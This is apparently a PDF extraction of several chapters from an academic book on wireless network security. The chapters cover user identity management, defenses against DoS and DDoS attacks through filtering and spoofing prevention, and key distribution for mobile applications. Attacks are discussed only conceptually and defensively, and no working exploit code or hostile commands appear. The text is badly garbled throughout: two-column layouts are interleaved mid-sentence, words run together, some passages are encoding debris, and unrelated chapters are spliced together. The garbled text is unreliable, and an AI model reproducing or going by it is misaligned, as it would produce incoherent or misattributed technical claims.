Nowadays people are increasingly connected access to different types of network resources in
through wireless networks from public places to next generation networks (Li et al., 2005). Such
theiroffice/homeareas.Thedeploymentofnetworks packet-will provide ubiquitous service access
based mobile networks has provided mobile users taking the advantages of each of these forms of
with the capability to access data services in every wireless communications. Service intake will be
situation. The next-generation wireless network increasedsignificantlythroughtheavailabilit
is expected to integrate various radio systems reach of innovative and easy-to-use services. Apart
including third generation (3G), wireless LANs from the remote service access (Web services), the
(WLANs), fourth generation (4G), and others. One introduction of near field communication (NFC)
motivation of this network is the pervasive comput- in use with a mobile phone can enable many new
ing abilities, which provide automatic handovers proximity services.
for any moving computing devices in a globally
Identity Management
User identity solutions and its hassle-free man- bAckground

agement will play a vital role in the future ubiqui-
tous service access. Current identity solutions can In a broadest sense, identity management encom-
no longer cope with the increasing expectations of passesdefinitionsandlife-cyclemanagementfor
both users and service providers in terms of their useridentitiesandprofiles,aswellasenvironmen
usability and manageability. Mobile and Internet for exchanging and validating such information. A
service providers are increasingly facing the same service provider issues identity to its users. Identity
identity management challenges as services in life-cycle management comprises establish/re-
bothdomainscontinuetoourish. fl Real-establishment
timedataof identity, description of identity
communication capabilities of mobile networks attributes, and at the end revocation of identity.
will multiply the remote service accesses through Attributes are a set of characteristics of an identity
mobilenetworks,ifefficientidentitymanagement that are required by the service providers to identify
and security is ensured over the wireless access. a user during service interactions. User authenti-
Personalizationthroughcustomizedcates user profiles
to the service providers as real owner of the
based on their preferences will become an impor- identity for accessing services. Authentication is
tant factor for success of future wireless service a key aspect of trust-based identity attribution,
access. In more advanced service scenarios, open providing a codified assurance of the identity of
identity management architecture enables the use of one entity to another.
standarduserprofileattributes,likeage andgender,wireless network includes
Next-generation
and authorizations for service, such as location, state-of-the-art intelligent core network and vari-
to bring a richer user experience. Users, network ous wireless access networks. It is expected to of-
operators, and service providers can make use of an fer sufficient capacity, quality of service QoS) ( ,
open standard technology for identity management and interoperability for seamless service access
to meet their own specific requirements through
remotely. Currently the network and thereby the
customizations. There is clearly a need for such remote service access are often granted through
a standard for identity management that can be numerous user identification and authenticat
applied to all ubiquitous service access scenarios. mechanisms, such as, usernames/passwords/PIN
As user needs are at the center in the service world codes/certificates. Users have to register prior
from business perspective, identity management firstusageandpublishprivateinformation,ofte
mechanism should be user-centric. more than what is strictly necessary for service ac-
The impressive capabilities and reach of emerg- cess. It hampers user’s privacy. There is a growing
ing next-generation networks, the abundance of consensus among the legislators across the world
services, and on-going development in user device that individual’s rights of privacy and the protec-
require proper address to the user identity manage- tion of personal data is equally applicable in the
ment issues which have yet met the stakeholders’ context of the Information Society as it is in the
expectations. The main goal of this chapter is to off-line world. To address this issue, a user-centric
discuss these concerns. The second section dis- identity management framework is expected where
cusses the background of identity management. users having complete control over the identity
In the third section, requirements and framework information transmission.
of identity management mechanism for wireless Some services happen in the proximity of users
service access are given mentioning the current at local access points. These services are accessed
efforts by various organizations. Security issues are through physical interactions with physical cards
also a part of this mechanism. The fourth section or devices, for example, payment and admittance.
provides the future trends. The chapter concludes The use of NFC with mobile phones to transfer user
with the summary of all discussions. information from one device to another boosts the
intake of proximity services. The user personal
0
Identity Management
device is often used to store his/her identity in- In general, common identity deployment archi-
formation. To protect unauthorized service access, tecturescanbebroadlyclassifiedintothreetyp
users also need to be authenticated before accessing Silo, Walled Garden, and Federation (Altmann &
such devices. It is evident that a user is burdened Sampath, 2006, p. 496). Current identity manage-
with too many identities to access many remote ment in the service world is mostly silo-based.
and proximity services. An integrated approach is Silo is a simple architecture, which requires each
required to manage all those identities to access service provider to maintain a unique ID for each
all these services. user. This approach is simpler from a service
Wireless service access results in more com- provider’s point of view but it is not only labori-
plexity to manage identities prior to accessing the ous but also problematic for the user. Moreover,
services. Besides device authentications, users need it results in a huge waste of resources due to the
to authenticate themselves before accessing the possession of redundant identity information in the
wireless networks. In addition to this, because of service world. As studies show, users who register
the size limitations, mobile devices are equipped with several service providers routinely forget
with smaller screens and limited data entry capa- their passwords for less frequently used accounts.
bilities using small keypads. For wireless services Thishasasignificantfinancialeffect.Onaverage,
to succeed, it is critical that the mobile users are $45 is spent on password reset each time a user
able to get convenient and immediate access to the forgets a password (Altmann & Sampath, 2006,
information and services they need without going p. 496). Walled Garden is a centralized identity
through long menus and having to enter various management approach where all service providers
usernames and passwords. can typically rely on one singe identity provider to
In the future, one of the key issues of identity manage the user’s identity. The user is benefited
management in the wireless domain will be who through managing only a single set of credentials.
the identity providers will be to the users and who Itsinherentweaknessis,oncethe - significantbar
will own/manage the subscriber identity module rier of protection is compromised, a malicious user
(SIM/USIM). It is because, currently, almost every enjoys unbridled access to all resources. Lastly, in
service provider is also an identity provider for identity federation management a group of service
users to access that specific service. SIM card
providers is a federation. Here, each service
forms
in fact a smart card with processing and informa- providerrecognizestheidentifiersofotherserv
tion storage capabilities. With the development of providers and thereby, consider a user who has
powerful, sophisticated as well as secure smart been authenticated by another service provider to
cards, it is now considered as the storage place be authenticated as well. However, the real dis-
for user’s identity information. In current cellular tinction between Walled Garden and Federation
models, the operator provides not only the wireless approach is that here service providers have their
access but also owns and manages SIM/USIM. In own unique identifiers and credentials. Though
this case, the user has little control over his/her this approach is widely accepted considering the
identity. A user is having a SIM/USIM as his/her heterogeneity of service providers, many possible
identity but is not allowed to modify or update it service interaction scenarios and the requirements
so that he/she cannot subscribe to new wireless of several levels of security make such a system
providers or to whatever service providers he/she far more complex.
likes. A collaborative operator model has been
thought where such identity module belongs to
the user (Kuroda, Yoshida, Ono, Kiyomoto, & IdEntIty MAnAgEMEnt for
Tanaka, 2004, pp. 165-166). A third party can wIrElEss sErvIcE AccEss
provide the infrastructure to manage such identity.
This approach leads towards user-centric identity Designing an identity management mechanism to
managementandprovidestheuserwith exibility
fl
access both remote and proximity services, without
in choosing wireless providers.
0
Identity Management
using numerous inconvenient identity solutions, is Identity Management solutions and

expected to be the main focus in the identity man- controversies
agement for service access over wireless networks.
This section also considers the selection of a user Various institutes and industries are working to de-
identity storage place, the role of identity provider,
velop the required identity management solutions.
and various other requirements to develop such a SXIP (“The SXIP 2.0 Overview,” n.d.). identity
mechanism from a wireless service access point has designed a solution to address the Internet-
of view. scalable and user-centric identity architecture. It
provides user identification, authentication
requirements of Identity Internet form fill solutions using Web interfaces
Management systems for storing user identity, attribute profiles, a
facilitating automatic exchange of identity data
Identity management system should be user-centric. over the Internet. Windows CardSpace uses vari-
It means such a system should reveal information ous virtual cards (mimic physical cards) issued by
identifying a user with user’s consent. Security is theidentityprovidersforuseridentification
one of the most important concerns of this system. authentications, each retrieving identity data from
The system should protect the user against decep- an identity provider in a secure manner (Chowd-
tion, verifying the identity of any parties who hury & Noll, 2007). In the Liberty Alliance Project
ask for information to ensure that it goes to the (Miller et al., 2004), members are working to build
right place. In the user-centric approach, the user open standard-based specifications for federate
will decide and control the extent of identifying identity and interoperability in multiple federa-
information to be transmitted. The system must tions, thereby fostering the usage of identity-based
disclose the least identifying information possible. Web services. Within this, they are focusing on
By following these practices, the least possible end-user privacy and confidentiality issues and
damage can be ensured in the event of a breach. solutions against identity theft. But these efforts
These are some of the requirements to design a are mainly focusing on identity management in
user-centric identity management system in The the Internet domain.
Laws of Identity (Cameron, 2005). Besides working for identity handling in a Web
Identity management system requires an in- domain, Liberty Alliance (Miller et al., 2004)
tegrated and often complex infrastructure where also provides solutions in identity management
all involved parties must be trusted for specific
for mobile operators. It proposes single sign-on
purposes depending on their role. Since there are (SSO) to relieve the users from managing many
costs associated with establishing trust, it will usernames/passwords and for fast access to the
be an advantage to have identity management resources. But in SSO, if a malicious attacker se-
models with simple trust requirements (Jøsang, cures one of the user’s accounts, he/she will enjoy
Fabre, Hay, Dalziel, & Pope, 2005). Success of an unbridled access to data pertaining not only
an identity management system depends upon the to that account but also across all her accounts
ability to interoperate across a trusted network of spread across domains. Therefore, some research
businesses, partners, and services regardless of the approaches do not encourage such SSOs (Altmann
platform, programming language, or application & Sampath, 2006, p. 500). However, a current ver-
with which they are interacting. It should handle sion of liberty, Shibboleth, reduces such risk by
user identities for both remote (Web) and proximity providing an attribute-based authorization system.
service access. Above all, such a system should But in wireless service access, especially for mobile
be user friendly. devices seamless service sign-on solutions and
one-click access to personalized services are key
issues for successful identity management.
0
Identity Management
Apart from possessing numerous usernames/ identity management systems, is a debatable issue.
passwords/PIN codes for remote (Web) service Liberty Alliance (Miller et al., 2004) believes that
access, the user is also carrying many physical mobile operators are in a good position to become
identities for proximity service access. These in- the most favored identity providers, because they
clude credit card, bank card, home/officepossess access valuable static and dynamic user informa-
cards, and so forth. Many researchers working tion which can be transmitted to third parties in
in these areas are proposing the smart cards, like a controlled manner through open standard Web
SIM/USIM currently used in mobile phones, as the service interface. Mobile operators also have the
secure storage place for the user’s identity informa- ability to seamlessly authenticate users with the
tion because it can be revoked, users nowadays can phone number on behalf of the service provid-
rarely be found without a mobile phone and there ers (SP). Many contradict such roles of mobile
are possibilities of security enhancements. Custom operators. Instead a more trusted third party, like
made SIMs/USIMs having enough computational financialinstitutesandgovernmentsarealsow
power and storage space can be used to manage positioned to become preferred identity providers.
users’identificationinformationand Theymulti-
mightfactor
provide identity services for their
authentication mechanisms. Gemalto, a company specific market and services that need stronge
providing digital security, is involved in developing user identities. When a user wants to subscribe to
sophisticated smart cards (e.g., SIM/USIM) based a new wireless network, he/she asks the third party
online or off-line identity management with associ- identityprovidertoaddnewidentificationdata
ated software, middleware, and server-based solu- his/her phone. In such a situation, it is possible
tions. NXP, a semiconductor company (formerly a that a third party can even manage SIM/USIM,
divisionofPhilips),isalsoofferingidentification which is currently done by cellular operators. It is
products in areas like government, banking, ac- expected that the next-generation wireless network
cess control, and so forth using secure innovative willhavesuchexibility. fl
contactless smart cards and chips. Credit card
companies are running various trials for providing components of user Identities
user’s payment identity handling solutions using
mobile phones and NFC technology. Tap N Go is Identity management in wireless service access
the name of a contactless payment trial powered needs to address device-level security, network-lev-
by MasterCard PayPass (2007) in the U.S. started el security, and service-level security (Kuroda et al.,
in 2006. In the same year, Visa completed contact- 2004, p. 169). Therefore, the over-all user identity
less-based mobile pilots in Malaysia and the United comprises device, network, and service identities.
States, using NFC-enabled phones, complementing The user’s device is divided into two components,
existing programs in Japan and Korea. In February a personal smart card (e.g., SIM/USIM) and mobile
2007, Visa International and SK Telecom of South devices with wireless access capabilities. The smart
Korea announced the world’sfirstcontactless - cardpayincludesuseridentificationdatathatcon
ment application on a universal SIM card which is user’spublicorshared-secretkeys,certificatesf
personalized over-the-air based on Visa’s recently network operators, and service providers. The card
introduced mobile platform (“Visa’s mobile plat- and the device need to be mutually authenticated in
form initiative,” 2007). the initial setup phase because both devices have
Identity providers issue identities to each user. built no relationship of trust to exchange security
They have a very important central role in the information from the very beginning. Afterwards,
identity management business. The identity pro- the user identifies him/herself to the card, sinc
vider manages users’ identities and their access it stores sensitive personal information, which is
rights to various services securely. It provides the used for network- and service-level authentication.
authentication and authorization services to the The user can identify through PIN, password, or
users. Who can be the identity providers in future biometrics. After these authentication procedures,
0
Identity Management
)LJXUH 8VHULGHQWL¿FDWLRQVWRHQVXUHGHYLFH card/code, and so forth. According to Dick Hardt

network-, and service-level security (keynote speech at OSCON 2005 conference),
founder and CEO of SXIP Identity, individual’s
interests, fondness, preferences, or tastes are also
part of his/her identity. These roles can be dealt with
by user’s SIDs. Some of these identities are having
very sensitive user information therefore very strict
authentication requirements have to be met. Some
others require less secure infrastructure as they
possess not so sensitive user information.
Considering all these aspects, instead of storing
user’s vast identity information into a single place
(a user device), these can be distributed into two
places. The less sensitive user identity information,
especially his/her SIDs can be stored in a secure
network identity space. The most sensitive iden-
the card delegates user identity information to tity information like user’s PIDs will be stored in
the mobile device to authenticate wireless access user’s personal device. The mobile phone (more
and thereby, service access. The user expects to correctly the SIM card) has been proposed as the
use services without being concerned about the user’s personal device (Chowdhury & Noll, 2006).
individual characteristics of each wireless access. When the user subscribes to the identity services,
1HWZRUNOHYHODXWKHQWLFDWLRQYHUL¿HVWKDWWKHXVHU WKHLGHQWLW\SURYLGHU,’3LVVXHVDFHUWL¿FDWHWR
is a subscriber and has wireless access to the right him/her. It will be stored in the device. At the same
QHWZRUN6HUYLFHOHYHODXWKHQWLFDWLRQYHUL¿HVWKDW time, a secure identity space in the network will
the user is a subscribed user to the right services. EHDOORFDWHGIRUWKHXVHUWRR7KHGHYLFHLGHQWL¿H
In each case, service or network providers and user and authenticates the user to access his/her network
device mutually authenticate each other. Figure identity space. When the user authenticates to the
1 depicts the overview of device-, service-, and device and the network, he/she can also gain ac-
QHWZRUNOHYHOLGHQWL¿FDWLRQVWRHQVXUHWKHVHFXULW\ cess to the network identity space (if it requires,
of user-device, network, and services for wireless an optional password can also protect such access).
service access. The user device holds the most sensitive user
identity information. Depending on the security
Integrated Identity Management requirements of the services, the possession-based
Mechanism authentication (e.g., having a personal device) can
be enhanced by a knowledge factor (e.g., PIN code).
Every human being is playing numerous roles in An additional knowledge-based authentication
life to live. To organize the user identities in a more mechanism can be used here to grant access to
structured way, all user identities can be broadly sensitive PIDs stored in the device. This is how
categorized into three areas based on the roles user identities can be stored in a distributed manner
he/she exercises in real life (Chowdhury & Noll, and multi-factor authentication mechanisms can
2006). These are personal identity (PID), corporate protect the security of user’s identities.
identity (CID), and social identity (SID). PIDs can In future service access scenarios, the user
be used to identify a user in his/her very personal expects a hassle-free use of identities. In this re-
and commercial service interactions. CIDs and gard an approach is expected to integrate all user’s
SIDs can be used in professional and social, in- identities to access every remote and proximity
terpersonal interactions respectively. For example, services into a single mechanism. The distributed
3,’VLQFOXGHEDQNFUHGLWFDUGKRPHRI¿FHDFFHVV identity infrastructure just being described can also
109
Vulnerability Analysis
attack by falsifying the source address of the possibilityistodiverttrafficbasedonIPprotoco

network communication. This makes it more dif- to different servers or even route it differently.
ficulttoidentifythesourcesofattack Thus, traffic.
for a Web Itis server it might be possible to
therefore important to use network switches that route ICMP and UDP traffic bound for the Web
haveMACbindingfeaturesthatstorethe serverfirst MAC else entirely, or even block it
somewhere
address that appears on a port and do not allow at the router, so that only TCP-based oods fl will
this mapping to be altered without authentication. succeed. This at least narrows the scope of attacks
To prevent IPspoofing, disable source routing on that can be made.
allinternalroutersanduseingress Web filtering.
Another filtering technique is called ingres
spoofing depends mainly upon social engineering filtering. This filtering prevents spoofed attac
tricks and it is thus important to educate users and from entering the network by putting rules on
to be generally aware of the address window in a point-of-entry routers that restrict source addresses
browser that displays the Web address that they to a known valid range.
are directed to. That can help if some suspicious Filtering can also be based on channel control.
Web site address comes up. DNSspoofing can be Thismethodisknownaschannelcontrolfiltering
prevented by securing the DNS servers and by andcanbeachievedbyfilteringoutDDoScontrol
implementinganti-IPaddressspoofingmeasures messages; this prevents the attacker from causing
(Paul, Ben, & Steven, 2003). Some vendors have the attack servers to begin the attack. This can also
added access control lists (ACL), implemented be accomplished using a signature-based packet
throughMACaddressfiltering,toincrease - filter. secu
Ifwecandevelopsignaturesformostcontrol
rity. MAC address filtering amounts tochannel allowing packets, we can simply reject them at the
predeterminedclientswithspecificMAC addresses
control channelpacketfilter,and- theywilldisa
to authenticate and associate. While the addition of pear from the network.
MACaddressfilteringincreasessecurity,itisnota
perfect solution given that MAC addresses can be
spoofed. Also, the process of manually maintaining futurE trEnds
a list of all MAC addresses can be time consuming
anderrorprone.ThereforeMACaddressDue filtering
to the rapid changes in treat level and attack-
is probably best left for only small and fairly static ing techniques, existing defense mechanisms may
networks (Mohammed & Issac, 2005). not be adequate to counter the threats of the future
attacks. Therefore, it is important for researchers
Filtering Techniques to continue analyzing different threats as they
emerge and develop more effective and efficient
Filtering requires being able to filter defense the ood
fl
mechanisms. For instance, detecting
packets. This can be achieved with a signature- distributed and automated attacks still remains
based packet filter. If one can create signatures a challenge. Due to the drawback of some of the
for typicalood fl packets (TCP packets with zero
exiting solutions or defense mechanisms as well as
data size for example, or unusually large ICMP the emergence of new attack tools, further study is
packets)and , filteroutthosepackets,needed onecan then well-known security drawbacks
to combine
filter the ood fl packets while allowing “normal”
with defense techniques that are already mature
traffictoproceed. and very effective. Moreover, it is also important
Another filtering option is to reject to look theinto the first
developing of DoS management
IP packet from any IP address. This works with framework for protecting, detecting, and reacting
many current generations of attack tools because to attacks when they occur. The following sum-
theytendtouseaat fl distributionrandom marizesnumber
expected future trends in DoS and DDoS
generator to generate spoofed source addresses, and attacks—attacks on emerging technologies; attacks
they only use each random address once. Another against anti-DoS infrastructure; attacks with the

aid of malware, adware, or spyware; recursive Craig, A. H. (2000). The latest in denial of service
DNS attacks or the use of DNS server for DoS attacks:Smurfingdescriptionandinformationto
attack; and attacks against OpenEdge WebSpeed minimize effects. Retrieved May 17, 2006, from
platforms, and so forth. http://www.pentics.net/denial-of-service/white-
papers/smurf.cgi
Davidowicz, D. (1999). Domain name system
conclusIon (DNS) security. Retrieved June 23, 2006, from
http://compsec101.antibozo.net/ papers/dnssec/
This chapter explores some of the security vulner-
dnssec.html
abilities associated with 802.11 wireless networks.
Here basic issues with WEP and better protocols Dierks, T., & Allen, C. (2006). The TLS protocol
like TKIP and CCMP were discussed with some (RFC 2246). Retrieved December 7, 2006, from
advice on security precautions. Later emphasis http://www.ietf.org/rfc/rfc2246.txt
was given on DoS and DDoS attacks to show
Dworkin, M. (2004). Recommendation for block
how complicated and varied they are in nature.
cipher modes of operation: The CCM mode of
DoS attacks are done quite effectively against
authenticationandconfidentiality. Retrieved No-
wired and wireless networks and it costs much in
vember 17, 2006, from http://csrc.nist.gov/publica-
terms of the damages done. Defense mechanisms
tions/nistpubs/800-38C/SP800-38C.pdf
against such attacks are still not perfect and the
chapter eventually reviews and explains some sets Earle, A. E. (2006). Wireless security handbook.
of defense mechanisms that could help against Auerbach Publications, Taylor & Francis Group.
such attacks.
Fluhrer, S., Mantin, I., & Shamir, A. (2001). Weak-
nesses in the key scheduling algorithm of RC4.
Retrieved July 25, 2005, from http://downloads.
rEfErEncEs
securityfocus.com/ library/rc4_ksaproc.pdf
Agarwal, S., Dawson, T., & Tryfonas, C. (2003). Fontana, J. (2007). Network World. Retrieved
DDoS mitigation via regional cleaning centers April 5, 2007, from http://www.networkworld.
(Tech. Rep. No. RR04-ATL-013177). Sprint ATL com/news/2007/011907-microsoft-secure-vpn-
Research Report. tunneling-protocol.html
Blunk, L., & Vollbrecht, J. (1998). PPP extensible Gast, M. (2002). 802.11 wireless networks—The
authentication protocol (EAP) (RFC 2284). Re- definitiveguide. CA: O’Reilly Media.
trieved December 25, 2006, from http://www.ietf.
org/rfc/rfc2284.txt Greenhalgh, A., Handley, M., & Huici, F. (2005).
Using routing and tunneling to combat DoS attacks.
Cable, G. (2004). Wi-Fi protected access data In ProceedingsoftheWorkshop 502 onStepsto
encryption and integrity. Retrieved December ReducingUnwantedTrafficontheInternet.
17, 2006, from http://www.microsoft.com/technet/
community/columns /cableguy/cg1104.mspx Held, G. (2003). Securing wireless LAN. Sussex,
England: John Wiley & Sons.
Cam-Winget, N., Housley, R., Wagner, D., &
Walker,Security
J..) 302 ( aws
fl indata
1 .2 0 8 link Hurton, M., & Mugge, C. (2003). Hack notes—Net-
protocols. Communications of the ACM, 35-39. work security portable reference. CA: McGraw-
Hill/Osborne.
Christos, D., & Aikaterini, K. (2003). DoS attacks
anddefensemechanism:Classifications In-Stat. (2006). In-stat market survey. Retrieved
andstate-
of-the-art. Computer Networks, 44, 643-666. May 11, 2007, from http://www.in-stat.com

Issac, B., Jacob, S. M., & Mohammed, L. A. (2005). http://www.wi-fiplanet.com/tutorials/article.

The art of war driving—A Malaysian case study. php/3667586
In Proceedings of IEEE International Conference
Richard, W. (2005). VoiceoverwirelessLAN - adop
on Networks (ICON) (pp. 124-129).
tion triples by 2007. Retrieved January 05, 2007,
Kandula, S., Katabi, D., Jacob, M., & Berger, A. from http://www.infonetics.com/resources/purple.
(2005). Botz-4-sale: Surviving organized DDoS shtml?upna0wl. . 5 nr.shtm
attacks that mimic ash fl crowds. In
Proceedings
Shields, C. (2002). What do we mean by network
of the 2nd Symposium on Networked Systems and
denialofservice? In
Proceedings of the 2002 IEEE
Design and Implementation.
workshop on Information Assurance (pp. 196-203).
Lynn, M., & Baird, R. (2002). Advance 802.11 U.S. Military Academy.
attack, Blackhat 2002. Retrieved June 19, 2006,
Strand, L. (2004). 802.1x port-based authentication
from http://www.blackhat.com/html/bh-usa-02/
HOWTO. Retrieved July 15, 2005, from http://www.
bh-usa-02-speakers.html#baird
tldp.org/HOWTO/8021X-HOWTO
Marti, S., Giuli, T., Lai, K., & Baker, M. (2001).
Takahashi, T. (2004). WPA passive dictionary at-
Mitigating routing behavior in mobile ad hoc net-
tack overview (White Paper).
works. In Proceedings of Mobicom, Rome.
Yih-Chun, H. (2006). Wormhole attacks in wire-
Mohammed, L. A., & Issac, B. (2005). DoS attacks
less networks. IEEE Journal on Selected Areas in
and defense mechanisms in wireless networks. In
Communications, 24(2), 370-380.
Proceedings of the IEE Mobility Conference (Mo-
bility, ) 502 Guangzhou, China (pp. P2-1A).
Additional Important Links/References:
Papadimitratos, P., & Haas, Z. J. (2002). Secure
routing for mobile ad hoc networks. In Proceed-
CERT Coordination Center References
ings of the SCS Communication Networks and
Distributed Systems Modeling and Simulation
Conference (CNDS 2002), San Antonio, TX. http://www.cer t.org/advisories/CA -2000-
11.html
Park, K., & Lee, H. (2001). On the effectiveness
ofroute-basedpacketfilteringfordistributed DoS
http://www.cert.org/research/JHThesis/Chapter11.
attack prevention in powerless Internet. In Pro- html
ceedings of the ACM SIGCOMM_01 Conference
on Applications, Technologies, Architectures, and http://www.cert.org/incident_notes/IN-2000-
Protocols for Computer Communications (pp. 15- 04.html
26) New York: ACM Press. http://www.cert.org/tech_tips/denial_of_service.
Paul, C., Ben, C., & Steven, B. (2003). Security+ html
guide to network security fundamentals. Thomson http://www.cert.org/archive/pdf/DoS_trends.pdf
Course Technology (pp. 47-84).
http://www.cert.org/research/isw/isw2000/pa-
Perrig, A., Canetti, D., Tyger, D., & Song, D. (2000). pers/42.pdf
Efficientauthenticationandsignatureofmulticast
streams over lossy channels. In Proceedings of
the IEEE Symposium on Security and Privacy Other links
(pp. 90-100).
http://www.kb.cert.org/vuls/
Phifer, L. (2007). WPA PSK crackers: Loose
lips sink ships. Retrieved April 2, 2007, from http://www.usenix.org/publications/login/2000-
7/apropos.html

http://www.iss.net traffic on the network for consuming server’s or

network’s resources.
http://www-1.ibm.com/services/continuity/re-
cover1nsf/
. files/Downloads/file/
$ DOS.pdf Information Security: Information security
isamechanismdealingwithproviding - confiden
http://www.cymru.com/~robt/Docs/Articles/dos-
tiality, integrity, authentication, and non-repudia-
and-vip.html
tion.
Network Security: Network security is a
kEy tErMs mechanism dealing with protection of the network-
ing system as a whole and sustaining its capability
Denial of Service (DoS): Denial of service are to provide connectivity between the communicat-
attacks to prevent legitimate users from receiving ing entities.
services from the service provider.
Spoofing Attack: Spoofingattackinvolvesthe
Distributed Denial of Service (DDOS): creation of packets with a forged or faked source
DDOS is a type of DoS attack conducted by using IP addresses.
multiple sources that are distributed throughout
the network. Wireless Networks: Wireless networks are
based on a technology that uses radio waves or
Flooding Attack: Flooding attack involves radio frequencies to transmit or send data.
the generation of spurious messages to increase

Chapter XI
Key Distribution and
Management for
Mobile Applications
György Kálmán
Josef Noll
AbstrAct
This chapter deals with challenges raised by securing transport, service access, user privacy, and ac-
counting in wireless environments. Key generation, delivery, and revocation possibilities are discussed
andrecentsolutionsareshown.Specialfocusisonefficiencyandadaptationtothemobil
Device domains in personal area networks and home networks are introduced to provide personal digital
rights management (DRM) solutions. The value of smart cards and other security tokens are shown and
asecureandconvenienttransmissionmethodisrecommendedbasedonthemobilephone
communication technology.
A ProblEM of MEdIA AccEss already by transport layer encryption or deploying

shieldedtwistedpairSTP) ( orevenfibre.
On the dawn of ubiquitous network access, data New technologies emerged in the wireless
protection is becoming more and more important. world, and especially the IEEE 802.11 family has
While in the past network connectivity was mainly drastically changed the way users connect to net-
provided by wired connections, which is still con- works. The most basic requirements for new devices
sidered the most secure access method, current and are the capability of supporting wireless service
future users are moving towards wireless access access. The mobile world introduced general
and only the backbone stays connected by wires. packet radio service (GPRS) and third generation
In a wired environment, eavesdropping is existent, (3G) mobile systems provide permanent IP con-
but not as spread and also not easy to implement. nectivity and provide together with Wi-Fi access
While methods exist to receive electromagnetic points continuous wireless connectivity. Besides
radiation from unshielded twisted pair (UTP) communications devices such as laptops, phones,
cables, a quite good protection can be achieved also cars, machines, and home appliances nowadays
come with wireless/mobile connectivity.
Key Distribution and Management for Mobile Applications
Protecting user data is of key importance for is authenticated, the user has to trust the network
all communications, and especially for wireless unconditionally. In universal mobile telecommu-
communications, where eavesdropping, man-in- nications system (UMTS), strong encryption is
the-middle, and other attacks are much easier. applied on the radio part of the transmission and
With a simple wireless LAN (WLAN) card and provides adequate security for current demands,
corresponding software it is possible to catch, but does not secure the transmission over the
analyse, and potentially decrypt wireless backbone.traffic.
UTMS provides mutual authentication
The implementation of the first WLAN - encryp
through an advanced mechanism for authentication
tion standard wired equivalent privacy (WEP) and session key distribution, named authentication
had serious weaknesses. Encryption keys can be and key agreement (AKA).
obtained through a laptop in promiscuous mode
in less than a minute, and this can happen through
a hidden attacker somewhere in the surrounding. A long wAy to sEcurE
Data protection is even worse in places with public coMMunIcAtIon
access and on factory default WLAN access points
without activated encryption. Standard Internet Applying some kind of cryptography does not im-
protocols as simple mail transport protocol (SMTP) ply a secured access. Communicating parties must
messages are not encoded, thus all user data are negotiate the key used for encrypting the data. It
transmitted in plaintext. Thus, sending an e-mail should be obvious that the encryption key used for
over an open access point has the same effect as the communication session (session key) cannot be
broadcasting the content. With default firewall
sent over the air in plaintext (see Figure 1).
settingsanintruderhasaccesstolocal Inordersince
files, toenableencryptionevenforthefirst
the local subnet is usually placed inside the trusted message, several solutions exist. The simplest
zone. These examples emphasise that wireless links one, as used in cellular networks is a preshared
needsomekindoftrafficencryption. key supplied to the mobile terminal on forehand.
Whenthefirstwidespreaddigital - cellular
This key cannet be used later for initialising of the
work was developed around 1985, standardisation security infrastructure and can act as a master key
of the global system for mobile communication in future authentications.
(GSM) introduced the A5 cryptographic algo- In more dynamic systems the use of preshared
rithms, which can nowadays be cracked in real-time keys can be cumbersome. Most of WLAN encryp-
(A5/2) or near real-time (A5/1). A further security tion methods support this kind of key distribution.
threat is the lack of mutual authentication between The key is taken to the new unit with some kind of
the terminal and the network. Only the terminal out of band method, for example with an external
unit, as indicated in Figure 2. Practically all pri-
vate and many corporate WLANs use static keys,
allowing an eavesdropper to catch huge amounts
Figure 1. A basic problem of broadcast environ- of traffic and thus enable easy decryption of the
ment content. This implies that a system with just a se-
cured access medium can be easily compromised.
Non-aging keys can compromise even the strongest
encryption, thus it is recommended to renew the
keys from time to time.
Outside the telecom world it is harder to distrib-
ute keys on forehand, so key exchange protocols
emerged, which offer protection from the first
message and do not need any preshared secret.
The most widespread protocol is the Diffie-Hell -

Figure2.(a)Diffie-Hellmannkeyexchangeand(b)out-of-bandkeydelivery
(a) (b)
man (DH) key exchange of Figure 2, which allows Two keys, a public and a private are generated.
two parties that have no prior knowledge of each The public key can be sent in plaintext, because
other to jointly establish a shared secret key over messages encrypted with the public key can only
an insecure communications channel. be decoded by the private key and vice versa. The
This protocol does not authenticate the nodes to two way nature of public keys makes it possible to
each other, but enables the exchange data, which authenticate users to each other, since signatures
can be decoded only by the two parties. Malicious generated with the public key can be checked with
attackers may start a man-in-the-middle attack the public key. Message authenticity can be guar-
(see Figure 4). Since this problem is well-known, anteed. Still, the identity of the node is not proven.
severalmodificationsenableidentity based
The DH,for
signature proves only that the message was
example Boneh, Goh, and Boyen (2005) showed encoded by the node, which has a public key of the
a hierarchical identity based encryption method, entity we may want to communicate with.
which is operating in fact as a public key system, Identity can be ensured by using certificates.
where the public key is a used chosen string. CertificateauthoritiesCA) ( storepublickeysan
Public key infrastructure (PKI) can help de- after checking the owner’s identity out of band,
fending corresponding parties against man-in-the- prove their identity by signing the public key
middle attacks. Public key cryptography is based and user information with their own keys. This
on the non polynomial (NP) time problems, for methodisrequiredforfinancialtransactionsa
example of factorisation or elliptic curves. business and government operations. Without a

Figure 3. Principle of a man-in-the-middle at- froM kEy ExcHAngE to AccEss

tack control InfrAstructurE
Mobility and wireless access introduced new

problems in network and user management, as
compared to fixed network installations with
for example, port-based access restrictions. The
network operators want to protect the network
against malicious intruders, charge the correct user
for the use, and provide easy and open access to
their valued services.
CA, the public keys can be gathered into a PKI, Thefirststeptogetaccesstoan-encryptednet
which provides an exchange service. Here, most workistonegotiatethefirstsessionkey.Thishas
commonly, a method called web of trust is used. A been solved in coordinated networks like mobile
number of nodes, who think that the key is authen- networks through pre-shared keys. Authentication
tic, submit their opinion by creating a signature. and access control is provided by central entities
The solution enables community or personal key to ensure operations.
management, with a considerable level of authen- In computer networks, which are not controlled
ticity protection. in such way and usually not backed-up by a cen-
While public keys can be sent, private keys must tral authorisation, authentication, and accounting
be kept secret. Although they are protected usually (AAA), different methods have been created for
with an additional password, this is the weakest connection control. The basic method is still to
point in the system. If the user saves a key in a negotiate encryption keys based on a preshared
program in order to enter the key automatically, secret. Typical preshared keys are a password for
security provided by the system is equal to the hash calculation, one time password sent via cell
security of the program’s agent application. Private phone or keys given on an USB stick.
firewallsandoperatingsystempoliciesusually There arewillseveral solutions to protect the
not stop a good equipped intruder. data transmitted over a wireless link. In private
Another security issue for terminals is the lack networks, security based on preshared keys is a
of tamper resistant storage. Usage of smart cards working solution. In corporate or public networks,
is a solution to this issue, but introduces additional a more robust solution is needed. The most promis-
hardware requirements. The lack of secure storing way is to integrate session key negotiation into
age is getting much attention in DRM schemes. the AAA process. Since providers or companies
Most DRM schemes use a software-based method, have to identify the connected user, they rely on
